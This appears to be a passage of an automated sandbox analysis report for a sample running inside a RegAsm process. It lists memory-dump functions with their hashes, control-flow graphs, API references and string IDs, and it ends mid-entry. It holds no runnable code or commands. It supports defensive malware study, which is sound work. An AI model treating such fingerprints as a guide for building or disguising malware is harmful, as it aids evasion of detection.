                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: db1a729281c80f2ac1dff9ee23b686a1e0588769f6306eae0b02ca7ca8bdb9cb
                                    • Instruction ID: c3c20582901f11c47e03c31e2fbccc1eaf0b1dcd13e86194e73b9f57268ea746
                                    • Opcode Fuzzy Hash: db1a729281c80f2ac1dff9ee23b686a1e0588769f6306eae0b02ca7ca8bdb9cb
                                    • Instruction Fuzzy Hash: E241E870E01208CBEB58DFAAD9546DEFBF2AF88300F24C12AD419BB255DB355946CF40
                                    Function 06144BC1 Relevance: .1, Instructions: 97COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e408a4d6b4cbe2f4524df4389d45899db367f36438db058302f414738ed497a1
                                    • Instruction ID: 21540c4a0fb4e25bff8f80441c4c08a7036f57e8069addccbb6ef9a1f8e24b0b
                                    • Opcode Fuzzy Hash: e408a4d6b4cbe2f4524df4389d45899db367f36438db058302f414738ed497a1
                                    • Instruction Fuzzy Hash: 6341C4B0E012488BEB58DFAAD9547DEFBF2AF88304F24C12AD418BB255DB355946CF50
                                    Function 06148897 Relevance: .1, Instructions: 96COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2845bef8118522dea9d4eb3df6e174372cbfda029318bc2dfdbc5c2971a1a652
                                    • Instruction ID: 2363a53ce388567a667303e574cd3376e72e5d214493fa060bfbd1a830107945
                                    • Opcode Fuzzy Hash: 2845bef8118522dea9d4eb3df6e174372cbfda029318bc2dfdbc5c2971a1a652
                                    • Instruction Fuzzy Hash: B841D370E016488BDB58DFAAD9447DEFBB2AF88300F60C12AD419BB259DB359946CF41
                                    Function 06145D2B Relevance: .1, Instructions: 96COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 11823fba555c079031c11b3de965995698c8feb87ea307eaad57628c1d39cf5b
                                    • Instruction ID: 8c100b4522efa65c5caa8445920f29fb94eb79ce5008141deb5c3f2281e6e506
                                    • Opcode Fuzzy Hash: 11823fba555c079031c11b3de965995698c8feb87ea307eaad57628c1d39cf5b
                                    • Instruction Fuzzy Hash: 7341D470E012088BEB58DFAAD94479EFBF2AF89304F24C12AD418BB255DB345946CF54
                                    Function 06149140 Relevance: .1, Instructions: 94COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e02033ef19edd7a74e10f03c788688b7f0e42adb419cf798e33a1086046ffefd
                                    • Instruction ID: 05d663dc9009516d4cdf2ba4963e7d997132ab7b3595f742a7e166df22c17276
                                    • Opcode Fuzzy Hash: e02033ef19edd7a74e10f03c788688b7f0e42adb419cf798e33a1086046ffefd
                                    • Instruction Fuzzy Hash: 7E31C570E01208CBEB58DFAAD9446DEFBF2AF88300F64C52AD419BB259DB355946CF40
                                    Function 0614BCB0 Relevance: 2.7, Strings: 2, Instructions: 233COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1744 614bcb0-614bcc3 1747 614bcc5-614bcc7 1744->1747 1748 614bccc-614bce0 1744->1748 1749 614bd50-614bd53 1747->1749 1751 614bce6 1748->1751 1752 614bce2-614bce4 1748->1752 1753 614bce9-614bcee 1751->1753 1752->1753 1754 614bcf5-614bd0f 1753->1754 1757 614bd54-614bd60 1754->1757 1758 614bd11-614bd47 1754->1758 1761 614bd62 1757->1761 1762 614bd6a 1757->1762 1758->1754 1776 614bd49 1758->1776 1763 614bd64-614bd68 1761->1763 1764 614bd69 1761->1764 1766 614bd71-614bd87 1762->1766 1767 614bd6c-614bd70 1762->1767 1763->1764 1764->1762 1770 614bd90-614bdb7 1766->1770 1771 614bd89-614bd8b 1766->1771 1767->1766 1779 614bdee-614bdf0 1770->1779 1780 614bdb9-614bdcf 1770->1780 1773 614be94-614be9b 1771->1773 1776->1749 1781 614bdf2-614bdf4 1779->1781 1782 614bdf9-614be0d 1779->1782 1780->1779 1789 614bdd1-614bde8 1780->1789 1781->1773 1785 614be13 1782->1785 1786 614be0f-614be11 1782->1786 1788 614be16-614be33 1785->1788 1786->1788 1794 614be9c 1788->1794 1795 614be35-614be38 1788->1795 1789->1779 1789->1794 1799 614bea1-614bed4 1794->1799 1795->1794 1796 614be3a-614be3e 1795->1796 1797 614be80-614be8d 1796->1797 1798 614be40-614be46 1796->1798 1797->1773 1800 614be49-614be51 1798->1800 1807 614bedd-614bf2a 1799->1807 1820 614bed7 call 614bf40 1799->1820 1800->1799 1801 614be53-614be69 call 614ba60 1800->1801 1809 614be77-614be7a 1801->1809 1810 614be6b-614be6d 1801->1810 1817 614bf31 1807->1817 1818 614bf2c-614bf2f 1807->1818 1809->1794 1812 614be7c-614be7e 1809->1812 1810->1809 1812->1797 1812->1800 1819 614bf34-614bf39 1817->1819 1818->1819 1820->1807
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LR]q$LR]q
                                    • API String ID: 0-3917262905
                                    • Opcode ID: 505a17cc753b1926eb0d17468b13ea8e51acb7f90d1dc1327b78611023ac462c
                                    • Instruction ID: 70d581a7c488c9802300d29a277a4221384b4a2552ab8ac23109461a089a319b
                                    • Opcode Fuzzy Hash: 505a17cc753b1926eb0d17468b13ea8e51acb7f90d1dc1327b78611023ac462c
                                    • Instruction Fuzzy Hash: 7D818E34B141058FCB58EF79C894A6E77F6EF88604B1585A9E506DB3B1DB30EC02CB91
                                    Function 0614B6A8 Relevance: 2.7, Strings: 2, Instructions: 213COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1821 614b6a8-614b6b5 1822 614b6b7-614b6bb 1821->1822 1823 614b6bd-614b6bf 1821->1823 1822->1823 1824 614b6c4-614b6cf 1822->1824 1825 614b8d0-614b8d7 1823->1825 1826 614b6d5-614b6dc 1824->1826 1827 614b8d8 1824->1827 1828 614b871-614b877 1826->1828 1829 614b6e2-614b6f1 1826->1829 1831 614b8dd-614b8f0 1827->1831 1832 614b87d-614b881 1828->1832 1833 614b879-614b87b 1828->1833 1830 614b6f7-614b706 1829->1830 1829->1831 1839 614b708-614b70b 1830->1839 1840 614b71b-614b71e 1830->1840 1842 614b8f6-614b8f8 1831->1842 1843 614b8f2 1831->1843 1834 614b883-614b889 1832->1834 1835 614b8ce 1832->1835 1833->1825 1834->1827 1837 614b88b-614b88e 1834->1837 1835->1825 1837->1827 1841 614b890-614b8a5 1837->1841 1844 614b70d-614b710 1839->1844 1845 614b72a-614b730 1839->1845 1840->1845 1846 614b720-614b723 1840->1846 1862 614b8a7-614b8ad 1841->1862 1863 614b8c9-614b8cc 1841->1863 1848 614b8f9 1842->1848 1847 614b8f4 1843->1847 1843->1848 1849 614b716 1844->1849 1850 614b811-614b817 1844->1850 1854 614b732-614b738 1845->1854 1855 614b748-614b771 1845->1855 1851 614b725 1846->1851 1852 614b776-614b77c 1846->1852 1847->1842 1856 614b901-614b924 1848->1856 1859 614b83c-614b849 1849->1859 1857 614b82f-614b839 1850->1857 1858 614b819-614b81f 1850->1858 1851->1859 1860 614b794-614b7a6 1852->1860 1861 614b77e-614b784 1852->1861 1864 614b73c-614b746 1854->1864 1865 614b73a 1854->1865 1855->1859 1857->1859 1866 614b821 1858->1866 1867 614b823-614b82d 1858->1867 1885 614b85d-614b85f 1859->1885 1886 614b84b-614b84f 1859->1886 1880 614b7b6-614b7d9 1860->1880 1881 614b7a8-614b7b4 1860->1881 1869 614b786 1861->1869 1870 614b788-614b792 1861->1870 1871 614b8bf-614b8c2 1862->1871 1872 614b8af-614b8bd 1862->1872 1863->1825 1864->1855 1865->1855 1866->1857 1867->1857 1869->1860 1870->1860 1871->1827 1876 614b8c4-614b8c7 1871->1876 1872->1827 1872->1871 1876->1862 1876->1863 1880->1827 1899 614b7df-614b7e2 1880->1899 1896 614b801-614b80f 1881->1896 1888 614b863-614b866 1885->1888 1886->1885 1887 614b851-614b855 1886->1887 1887->1827 1890 614b85b 1887->1890 1888->1827 1891 614b868-614b86b 1888->1891 1890->1888 1891->1828 1891->1829 1896->1859 1899->1827 1900 614b7e8-614b7fa 1899->1900 1900->1896
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ,aq$,aq
                                    • API String ID: 0-2990736959
                                    • Opcode ID: 755bcc35f6de253ed85b3b3f9f099f2f01c21040bcae6ce460a8e5cd838be710
                                    • Instruction ID: 18b33ccd286c0e389dd7f9c035c5a35fd04d1dfafbc9dc3ae49d1c0a87f8b16c
                                    • Opcode Fuzzy Hash: 755bcc35f6de253ed85b3b3f9f099f2f01c21040bcae6ce460a8e5cd838be710
                                    • Instruction Fuzzy Hash: 2B81B034E0820BCFDB98EFA9C884A6EB7F6FF88301B158565D405973A5DB34E841DB91
                                    Function 0614B1D8 Relevance: 2.7, Strings: 2, Instructions: 187COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1902 614b1d8-614b20a 1903 614b220-614b22b 1902->1903 1904 614b20c-614b210 1902->1904 1907 614b231-614b233 1903->1907 1908 614b2d3-614b2ff 1903->1908 1905 614b212-614b21e 1904->1905 1906 614b238-614b23f 1904->1906 1905->1903 1905->1906 1910 614b241-614b248 1906->1910 1911 614b25f-614b268 1906->1911 1909 614b2cb-614b2d0 1907->1909 1914 614b306-614b342 1908->1914 1910->1911 1912 614b24a-614b255 1910->1912 1986 614b26a call 614b350 1911->1986 1987 614b26a call 614b1d8 1911->1987 1912->1914 1915 614b25b-614b25d 1912->1915 1934 614b344-614b348 1914->1934 1935 614b349-614b35e 1914->1935 1915->1909 1916 614b270-614b272 1917 614b274-614b278 1916->1917 1918 614b27a-614b282 1916->1918 1917->1918 1921 614b295-614b2b4 1917->1921 1922 614b284-614b289 1918->1922 1923 614b291-614b293 1918->1923 1928 614b2b6-614b2c7 1921->1928 1929 614b2c9 1921->1929 1922->1923 1923->1909 1928->1909 1929->1909 1934->1935 1938 614b360-614b366 1935->1938 1939 614b36d-614b37e 1935->1939 1938->1939 1941 614b384-614b388 1939->1941 1942 614b412-614b416 call 614b512 1939->1942 1943 614b398-614b3a5 1941->1943 1944 614b38a-614b396 1941->1944 1945 614b41c-614b422 1942->1945 1950 614b3a7-614b3b1 1943->1950 1944->1950 1947 614b424-614b42a 1945->1947 1948 614b42e-614b435 1945->1948 1951 614b490-614b4de 1947->1951 1952 614b42c 1947->1952 1955 614b3b3-614b3c2 1950->1955 1956 614b3de-614b3e2 1950->1956 1988 614b4e0 call 614bcb0 1951->1988 1989 614b4e0 call 614bca0 1951->1989 1990 614b4e0 call 614beb8 1951->1990 1952->1948 1967 614b3c4-614b3cb 1955->1967 1968 614b3d2-614b3dc 1955->1968 1958 614b3e4-614b3ea 1956->1958 1959 614b3ee-614b3f2 1956->1959 1960 614b3ec 1958->1960 1961 614b438-614b489 1958->1961 1959->1948 1962 614b3f4-614b3f8 1959->1962 1960->1948 1961->1951 1964 614b4f6-614b50c 1962->1964 1965 614b3fe-614b410 1962->1965 1965->1948 1967->1968 1968->1956 1980 614b4e6-614b4ef 1980->1964 1986->1916 1987->1916 1988->1980 1989->1980 1990->1980
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Haq$Haq
                                    • API String ID: 0-4016896955
                                    • Opcode ID: 88e91d9e39ad1c7e5a2f94c9afbc65529ac987318213dd3808bacd6267b740a9
                                    • Instruction ID: 7b75e6df85f044be0845b39358f6c00bea3bc42d5787f56742f2cd9ab7a9a8fe
                                    • Opcode Fuzzy Hash: 88e91d9e39ad1c7e5a2f94c9afbc65529ac987318213dd3808bacd6267b740a9
                                    • Instruction Fuzzy Hash: 4661EE31B082248FDB55AF74C844B6E7BF6FF89340F058869E906DB281DB74D801CBA0
                                    Function 00F64CE1 Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                    Download Yara Rule
                                    APIs
                                    • KiUserExceptionDispatcher.NTDLL ref: 00F64D86
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID: DispatcherExceptionUser
                                    • String ID:
                                    • API String ID: 6842923-0
                                    • Opcode ID: 6715b015ab5ea559e709b84bfda83a29ce9ef6b9ca83faa8ecd9187288bc2e4c
                                    • Instruction ID: 6619ac5bb50d7b6d2d65f61690f20e6d6a729f428479c5ac0941bcba399fc981
                                    • Opcode Fuzzy Hash: 6715b015ab5ea559e709b84bfda83a29ce9ef6b9ca83faa8ecd9187288bc2e4c
                                    • Instruction Fuzzy Hash: 7A51D3308A0B26CFD3017F74EABC26A7F65FB4F7A3745AE01B11AAA450DB740464DE51
                                    Function 00F64CF0 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                    Download Yara Rule
                                    APIs
                                    • KiUserExceptionDispatcher.NTDLL ref: 00F64D86
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID: DispatcherExceptionUser
                                    • String ID:
                                    • API String ID: 6842923-0
                                    • Opcode ID: 82258611b0ade1aed69cd97a06f3e77bec9efbdbfa8cfe3a211e99345e6c9d42
                                    • Instruction ID: 9dfb624eb4f7ee9e52aa7e2997d135d70c1263f5dae659e5f030a30c658a4f43
                                    • Opcode Fuzzy Hash: 82258611b0ade1aed69cd97a06f3e77bec9efbdbfa8cfe3a211e99345e6c9d42
                                    • Instruction Fuzzy Hash: 3551C3308A0B26CFD3017F74AABC26A7F65FB4F7A3745AE00B11AAA450DF750464DA51
                                    Function 0616F8F0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0616F8BE,?,?,?,?,?), ref: 0616F97F
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 13eaeb6fe3987f2f7ca8b913534d33044c490bfe2d12b8c320e1d6313a09e305
                                    • Instruction ID: 25e5b125e1ce82aa09ab0955c6c133555896c3ef06a9c0635c0355995193fd86
                                    • Opcode Fuzzy Hash: 13eaeb6fe3987f2f7ca8b913534d33044c490bfe2d12b8c320e1d6313a09e305
                                    • Instruction Fuzzy Hash: BF2107B5900208AFDB10CF9AD984ADEFBF9EB48310F14841AE914B3210C378A940CFA1
                                    Function 0616F28C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                    Download Yara Rule
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0616F8BE,?,?,?,?,?), ref: 0616F97F
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223373192.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6160000_RegAsm.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 2214f4639eafbc7f08342d2122f35c467788059cb8ba06aa6082e60c155d7cf1
                                    • Instruction ID: 8d8d7d119d637bf5db6875eed9a23e36fc74b2a676c2577d1ca776ed65637c5d
                                    • Opcode Fuzzy Hash: 2214f4639eafbc7f08342d2122f35c467788059cb8ba06aa6082e60c155d7cf1
                                    • Instruction Fuzzy Hash: DC21E5B5900249AFDB50CF9AD984AEEFBF5EB48310F14841AE918B7310D378A954CFA5
                                    Function 00F68CA4 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LdrInitializeThunk.NTDLL(00000000), ref: 00F68DE7
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220892692.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f60000_RegAsm.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: f699dfcaf3c571a469cce9d321f0c02f0cab914d260723ac6b6dc6fc7ffc346f
                                    • Instruction ID: 377a097297fb12639cb1dd35d6e53000cf663d66b6b20c2f30393a1e09286600
                                    • Opcode Fuzzy Hash: f699dfcaf3c571a469cce9d321f0c02f0cab914d260723ac6b6dc6fc7ffc346f
                                    • Instruction Fuzzy Hash: 08114F74E011098FDB04DFE8D884AEDBBB5FF98345F64C259E814A7282DB34D982DB60
                                    Function 06149599 Relevance: .2, Instructions: 172COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dd12325201c39660064a87f3e39a7ede7c5726fbff6454d96da2a94cd8b8ec1a
                                    • Instruction ID: 89184761f84ac4ef9868f00c3fa76abc327cec70cc6e9ea54d7a90a94b18cd2a
                                    • Opcode Fuzzy Hash: dd12325201c39660064a87f3e39a7ede7c5726fbff6454d96da2a94cd8b8ec1a
                                    • Instruction Fuzzy Hash: 2C819174E412698FDBA5DF29DD81BDDBBB2BB89300F1084EAD849A7254DB305E81CF40
                                    Function 0614DAD9 Relevance: .2, Instructions: 153COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e0c7dea3f29748b4d1435798ec91c7421b91474a715557a6aff71c3763b6169b
                                    • Instruction ID: 78330c5330f7ee4a09646108b33271212590acd6c640e5befe9f7ecde6629991
                                    • Opcode Fuzzy Hash: e0c7dea3f29748b4d1435798ec91c7421b91474a715557a6aff71c3763b6169b
                                    • Instruction Fuzzy Hash: E171CF70E412289FEB64DF69DD50BD9BBB2AF89300F5080EAD55CA7290DB315E81CF41
                                    Function 0614B350 Relevance: .1, Instructions: 148COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e07a085634beda8b2576a43150e6945dcf151f2ae223ccb14ae28c1517688fb7
                                    • Instruction ID: 80de0c142c617ecd995932324d8f1a69a855d5a2f6b4a024d0a84b0e57f17906
                                    • Opcode Fuzzy Hash: e07a085634beda8b2576a43150e6945dcf151f2ae223ccb14ae28c1517688fb7
                                    • Instruction Fuzzy Hash: 25418C30B082118FDB59AF79849473E7BE6AFC8290F188869D546CB396DF38CD42D791
                                    Function 0614CDD8 Relevance: .1, Instructions: 146COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f6bd3fd31f13558a8abb0808d481efd5387099ad199dc19757fafbffaaf87e51
                                    • Instruction ID: d2f0c6af45a8853a446f7fb3b3b0efe1630b054e1ce582a74f54c89c2234ef1d
                                    • Opcode Fuzzy Hash: f6bd3fd31f13558a8abb0808d481efd5387099ad199dc19757fafbffaaf87e51
                                    • Instruction Fuzzy Hash: AA61BF74E012289FDB64DF69DC50BDABBB2AF89300F5080E9E50CA7254DB315E81DF41
                                    Function 0614A910 Relevance: .1, Instructions: 101COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 733f131ba040c865a81849180e8cfe6b7f3643a1e53235ac2c31b25917df494e
                                    • Instruction ID: fc4bbca8b29175782c0a5c14510b1edb740d68afefd2dadfd0e96470e2380c80
                                    • Opcode Fuzzy Hash: 733f131ba040c865a81849180e8cfe6b7f3643a1e53235ac2c31b25917df494e
                                    • Instruction Fuzzy Hash: 5D319031A402199FCF45AF64D844AAE3BA6FF88340F014424F9158B294CB36DD61EBE1
                                    Function 00F0D404 Relevance: .1, Instructions: 75COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220610378.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f0d000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d3679da1ea2b34da6325e1e05433024cf5449d7a619e65ac82a933885c70ceaa
                                    • Instruction ID: 496ba005886ba0a4789705503452c840d74ce236f4ec203026e9c529cccbd0f2
                                    • Opcode Fuzzy Hash: d3679da1ea2b34da6325e1e05433024cf5449d7a619e65ac82a933885c70ceaa
                                    • Instruction Fuzzy Hash: 6921677A500244DFCB05CF94C9C0F26BF65FB94324F20C569E9090B296C33AE846F7A2
                                    Function 0614B512 Relevance: .1, Instructions: 73COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 63993fbfa438d411deb63aeafac26b959717b7b288689fe2c68dbbadb7c8a530
                                    • Instruction ID: d361dbe59e0c256c416d8b11d2888231ee61d36a0a8bd8d11170007ea93e5295
                                    • Opcode Fuzzy Hash: 63993fbfa438d411deb63aeafac26b959717b7b288689fe2c68dbbadb7c8a530
                                    • Instruction Fuzzy Hash: 9721AE35B056218FC769AB28C85462AF7A6ABC87517054568E90ACF354CF34DC02CBC0
                                    Function 00F1D030 Relevance: .1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220679580.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f1d000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bade5f22eaa55d1b2626c158cc025f6fdfb97ae1fd15470a523ba91a53152867
                                    • Instruction ID: 85dfea53792baec30a8169a167f3fe2c93ad766ec4bf7539c475a997c3ac4ec7
                                    • Opcode Fuzzy Hash: bade5f22eaa55d1b2626c158cc025f6fdfb97ae1fd15470a523ba91a53152867
                                    • Instruction Fuzzy Hash: F2213471904204DFCB14DF14D9C0F26BBB5FB88324F24C66DD80A4B25AC33AD887EA62
                                    Function 00F1D005 Relevance: .1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220679580.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f1d000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 35ab005a9a2469649bfd5fd403412d29ca2052c8998bc5485cfec6887be8b775
                                    • Instruction ID: 9da5d128fb3a30baa533b266b2d195c5149596db764a384c6b52686cb829088c
                                    • Opcode Fuzzy Hash: 35ab005a9a2469649bfd5fd403412d29ca2052c8998bc5485cfec6887be8b775
                                    • Instruction Fuzzy Hash: 3D215C7150D7C09FCB07CB24D994711BF71AB46224F29C5DBD8888F2A7C23A984ADB62
                                    Function 0614ECA8 Relevance: .1, Instructions: 59COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 83ebdfeed0898e468cf15762842cfb1cf7dbbe5e5b8513d14c7b4da6ee454615
                                    • Instruction ID: 7d4cbad63b78fdffa5f6e1e811e4d1b86cef5237f4925329a9399e053c7c61dc
                                    • Opcode Fuzzy Hash: 83ebdfeed0898e468cf15762842cfb1cf7dbbe5e5b8513d14c7b4da6ee454615
                                    • Instruction Fuzzy Hash: B1210078D002099FCB04EFA4D988BEEBBB1FB88304F108969D814B3394DB785A54CF90
                                    Function 00F0D3FF Relevance: .1, Instructions: 56COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3220610378.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f0d000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
                                    • Instruction ID: e5ac636c014eab113a4b8dd9196a807aec748938e8b13a606500763f605691b5
                                    • Opcode Fuzzy Hash: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
                                    • Instruction Fuzzy Hash: 0E112676804280CFCB16CF40D9C4B16BF71FB94324F24C5A9DD090B656C33AE85AEBA2
                                    Function 0614BF40 Relevance: .1, Instructions: 54COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3223311804.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_6140000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f6cb9b4499e72c8263ea29513b9e838c7d69b04944f5d1d644bec6a9480fcb1f
                                    • Instruction ID: 92ce8da4a80789ac4cfbcb7659051fb5711d804b319f999847a7e8396d3619bc
                                    • Opcode Fuzzy Hash: f6cb9b4499e72c8263ea29513b9e838c7d69b04944f5d1d644bec6a9480fcb1f
